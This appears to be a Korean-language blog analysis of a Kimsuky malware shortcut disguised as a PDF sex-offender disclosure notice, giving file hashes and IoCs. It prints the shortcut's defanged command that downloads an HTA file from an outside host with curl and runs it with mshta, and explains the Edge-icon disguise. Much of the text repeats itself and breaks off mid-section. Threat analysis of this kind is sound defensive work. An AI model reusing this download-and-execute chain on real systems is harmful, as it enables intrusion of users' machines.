김수키(Kimsuky)성범죄자의 신상정보공개 양식 으로 위장해서 만든 악성코드-성범죄자 신상정보 고지.pdf.lnk(2025.3.25)
Contents
오늘도 정말로 존경하지 않는 북한 해킹 단체 김수키(Kimsuky)에서 만든 악성코드인 성범죄자 신상정보 고지.pdf.lnk(2025.3.25) 에 대해 알아보겠습니다.
파일명:성범죄자 신상정보 고지.pdf.lnk
사이즈:1 MB
MD5:1d64508b384e928046887dd9cb32c2ac
SHA-1:23cf29e451394d1824046335b2c85eaa2b6e4d0b
SHA-256:a66c25b1f0dea6e06a4c9f8c5f6ebba0f6c21bd3b9cc326a56702db30418f189
악성코드에 포함된 내용
StringData
{
namestring: not present
relativepath: not present
workingdir: not present
commandlinearguments: /c cd /d %temp% && curl -O hxxps://cdn(.)glitch(.)global/2eefa6a0-44ff-4979-9a9c-689be652996d/sfmw(.)hta?v=2 && mshta %temp%\sfmw(.)hta
iconlocation: %ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe
}
local_base_path: C:\Windows\System32\cmd.exe
악성코드 분석
cmd.exe /c는 뒤에 오는 명령어들을 한 줄로 실행하고 종료하는 명령어
/c는 주어진 명령어를 실행하고 cmd.exe 가 종료
cd /d %temp%
/d 옵션은 드라이브가 달라도 이동 가능하게 합니다.
%temp% 는 사용자 계정의 임시 폴더 (C:\Users\<username>\AppData\Local\Temp)
해당 디렉터리는 권한 없이도 파일 생성 가능->악성코드가 가장 자주 사용하는 폴더
curl -O hxxps://.../sfmw(.)hta?v=2
curl은 HTTP 요청을 통해 원격 서버로부터 파일을 다운로드
-O 옵션은 URL의 파일명을 그대로 저장
sfmw.hta?v=2->로컬 저장 명은 그냥 sfmw.hta
mshta %temp%\sfmw.hta
mshta.exe:Windows 기본 포함 실행파일
.hta 파일을 실행시켜 HTML/JS/VBS코드 실행
iconlocation:마이크로소프트 엣지 아이콘 사용
사용자에게 정상적인 마이크로소프트 프로그램처럼 보이도록 위장
sfmw.hta 는 VBScript 기반으로 작성된 악성 HTML
HTA(HTML Application)는 Windows에서 기본적으로 실행 가능한 형식으로 공격자가 스크립트 기반 악성 행위를 수행하기에 매우 적합한 포맷
파일 기본 정보
파일명:sfmw.hta
유형:HTML Application (.hta)
스크립트: VBScript |
주요 기능: 명령 실행 (Run),COM 객체 생성 (WScript.Shell) |
| 분석 …
파일명:성범죄자 신상정보 고지.pdf.lnk
사이즈:1 MB
MD5:1d64508b384e928046887dd9cb32c2ac
SHA-1:23cf29e451394d1824046335b2c85eaa2b6e4d0b
SHA-256:a66c25b1f0dea6e06a4c9f8c5f6ebba0f6c21bd3b9cc326a56702db30418f189
악성코드에 포함된 내용
StringData
{
namestring: not present
relativepath: not present
workingdir: not present
commandlinearguments: /c cd /d %temp% && curl -O hxxps://cdn(.)glitch(.)global/2eefa6a0-44ff-4979-9a9c-689be652996d/sfmw(.)hta?v=2 && mshta %temp%\sfmw(.)hta
iconlocation: %ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe
}
local_base_path: C:\Windows\System32\cmd.exe
악성코드 분석
cmd.exe /c는 뒤에 오는 명령어들을 한 줄로 실행하고 종료하는 명령어
/c는 주어진 명령어를 실행하고 cmd.exe 가 종료
cd /d %temp%
/d 옵션은 드라이브가 달라도 이동 가능하게 합니다.
%temp% 는 사용자 계정의 임시 폴더 (C:\Users\<username>\AppData\Local\Temp)
해당 디렉터리는 권한 없이도 파일 생성 가능->악성코드가 가장 자주 사용하는 폴더
curl -O hxxps://.../sfmw(.)hta?v=2
curl은 HTTP 요청을 통해 원격 서버로부터 파일을 다운로드
-O 옵션은 URL의 파일명을 그대로 저장
sfmw.hta?v=2->로컬 저장 명은 그냥 sfmw.hta
mshta %temp%\sfmw.hta
mshta.exe:Windows 기본 포함 실행파일
.hta 파일을 실행시켜 HTML/JS/VBS코드 실행
iconlocation:마이크로소프트 엣지 아이콘 사용
사용자에게 정상적인 마이크로소프트 프로그램처럼 보이도록 위장
sfmw.hta 는 VBScript 기반으로 작성된 악성 HTML
HTA(HTML Application)는 Windows에서 기본적으로 실행 가능한 형식으로 공격자가 스크립트 기반 악성 행위를 수행하기에 매우 적합한 포맷
파일 기본 정보
파일명:sfmw.hta
유형:HTML Application (.hta)
스크립트: VBScript |
주요 기능: 명령 실행 (Run),COM 객체 생성 (WScript.Shell) |
| 분석 …
IoC
a66c25b1f0dea6e06a4c9f8c5f6ebba0f6c21bd3b9cc326a56702db30418f189
1d64508b384e928046887dd9cb32c2ac
23cf29e451394d1824046335b2c85eaa2b6e4d0b
1d64508b384e928046887dd9cb32c2ac
23cf29e451394d1824046335b2c85eaa2b6e4d0b